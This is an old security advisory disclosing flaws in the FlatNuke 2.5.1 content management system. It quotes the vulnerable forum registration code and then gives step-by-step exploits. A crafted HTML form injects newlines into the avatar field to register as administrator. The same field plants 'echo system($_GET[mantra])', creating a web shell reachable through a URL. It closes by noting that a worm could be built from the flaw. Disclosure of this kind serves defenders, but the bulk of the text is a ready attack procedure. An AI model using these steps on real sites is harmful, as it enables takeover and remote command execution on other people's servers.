Multiple Vulnerabilities in FlatNuke
*************************************************************
* CODEBUG Labs
* Advisory #6
* Title: Multiple Vulnerabilities in Flat-nuke
* Author: Pierquinto 'Mantra' Manco
* English Version: David 'hanska' Paleino
* Product: Flat-Nuke 2.5.1
* Type: Multiple Vulnerabilities
* Web: http://www.codebug.org
*
**************************************************************
-) Software Page (www.flatnuke.org)
"FlatNuke is a CMS (Content Management System) which doesn't use any DBMS, in
favour of text files only (from this fact comes its name). The last stable
version of FlatNuke is 2.5.1."
-) The vulnerable function
The vulnerability stays in the index.php file in flatnuke's forum/ directory,
which is located in the scripts' main directory:
<?
if(!file_exists("users/$nome.php")) {
if(($nome == "") || ($regpass == "") || (stristr($nome, "")) ||
(strlen($nome) > 13) || (stristr($nome,"\"")) || (stristr($nome, "\\")) ||
($regpass != $reregpass)){
print _FERRCAMPO . "<br><a
href=\"javascript:history.back()\"><<" . _INDIETRO . "</a>";
}
else {
$nome = str_replace("<", "", $nome);
$nome = str_replace(">", "", $nome);
$nome = stripslashes($nome);
$regpass = str_replace("<", "", $regpass);
$regpass = str_replace(">", "", $regpass);
$anag = str_replace(">", "", $anag);
$anag = str_replace("<", "", $anag);
$anag = stripslashes($anag);
$email = str_replace("<", "", $email);
$email = str_replace(">", "", $email);
$email = stripslashes($email);
$homep = str_replace("<", "", $homep);
$homep = str_replace(">", "", $homep);
$homep = stripslashes($homep);
$prof = str_replace("<", "", $prof);
$prof = str_replace(">", "", $prof);
$prof = stripslashes($prof);
$prov = str_replace("<", "", $prov);
$prov = str_replace(">", "", $prov);
$prov = stripslashes($prov);
$ava = str_replace("<", "", $ava);
$ava = str_replace(">", "", $ava);
if ($ava == "")
$ava="blank.png";
if ($url_avatar != "") {
$ava = $url_avatar;
$ava = str_replace("<", "", $ava);
$ava = str_replace(">", "", $ava);
}
else {
$ava = str_replace("<", "", $ava);
$ava = str_replace(">", "", $ava);
$ava = "images/" . $ava;
}
$firma = str_replace("<", "", $firma);
$firma = str_replace(">", "", $firma);
$firma = stripslashes($firma);
# Stores the password in a MD5 hash.
$regpass = md5($regpass);
$firma = str_replace("\n", "<br>", $firma);
$fp = fopen("users/$nome.php", "w");
// these fwrite() don't need any concurrent
// access check since the user can only access
// his own file
fwrite($fp, "<?\n");
fwrite($fp, "#$regpass\n");
fwrite($fp, "#$anag\n");
fwrite($fp, "#$email\n");
fwrite($fp, "#$homep\n");
fwrite($fp, "#$prof\n");
fwrite($fp, "#$prov\n");
fwrite($fp, "#$ava\n");
fwrite($fp, "#$firma\n");
fwrite($fp, "#$level\n");
fwrite($fp, "?>\n");
fclose($fp);
...
?>
- - ) Remote Privilege Escalation
Make a HTML page with the following code:
<form action="http://www.sitewithflatnuke.org/forum/index.php"; method=post
name="registra">
<input type=hidden name=op value=reg>
Username*: <input name=nome><br>
Password*: <input name="regpass" type="password"><br>
Password*: <input name="reregpass" type="password"><br>
Name: <input name=anag><br>
E-mail: <input name=email><br>
Homepage: <input name=homep value="http://";><br>
Job: <input name=prof><br>
Country: <input name=prov><br>
<select name="ava">
<option value="">----</option>
<option value="blank.png">blank.png</option>
</select>
<br><br>
Or remote image URL:<br><br>
<textarea name="url_avatar" rows=5 cols=23></textarea>
<br>
Signature: <textarea name=firma rows=5 cols=23></textarea>
<center>
<input type=submit value="Send">
</center>
</form>
Once you open the HTML page in ANY web browser, you need to fill in every field
but the one called url_avatar, which we will use to register ourselves as
administrators.
In the "url_avatar" field, press Enter at least twice, then write #10, this way
we will make directives registering us as administrators precede that ones
which would register us as normal users.
All this is possible because the script, in the registration function, does not
check the values contained in the text fields that we have opportunely changed
into textarea fields.
- - ) PHP Code Injection
This bug came into evidence while I was writing about the Remote Privilege
Escalation:
<form action="http://www.sitewithflatnuke.org/forum/index.php"; method=post
name="registra">
<input type=hidden name=op value=reg>
Username*: <input name=nome><br>
Password*: <input name="regpass" type="password"><br>
Password*: <input name="reregpass" type="password"><br>
Name: <input name=anag><br>
E-mail: <input name=email><br>
Homepage: <input name=homep value="http://";><br>
Job: <input name=prof><br>
Country: <input name=prov><br>
<select name="ava">
<option value="">----</option>
<option value="blank.png">blank.png</option>
</select>
<br><br>
Or remote image URL:<br><br>
<textarea name="url_avatar" rows=5 cols=23></textarea>
<br>
Signature:
<textarea name=firma rows=5 cols=23></textarea>
<center>
<input type=submit value="Send">
</center>
</form>
Let's open again our HTML page from a browser and just fill in the fields like
we did for the Remote Privilege Escalation bug. We will now use our
"url_avatar" textarea to inject malicious code.
At this point, press Enter at least once and put out malicious PHP code, for
example:
echo system($_GET[mantra]);
This command, for example, will give us a shell accessible from:
http://www.sitewithflatnuke.org/forum/users/$yourforumnickname.php?mantra=command_to_execute
- ) Patch
To correct these vulnerabilities some further parameters-checking should be
implemented, and the users registration and mantainance system should be
restructured.
-) Notes
Through the use of Google or any other kind of search engine it is possible to
create a worm, like Santy for phpBB, and spread it over each system running
FlatNuke, with a high probability of causing damages.
*****************************************************************
http://www.codebug.org
*****************************************************************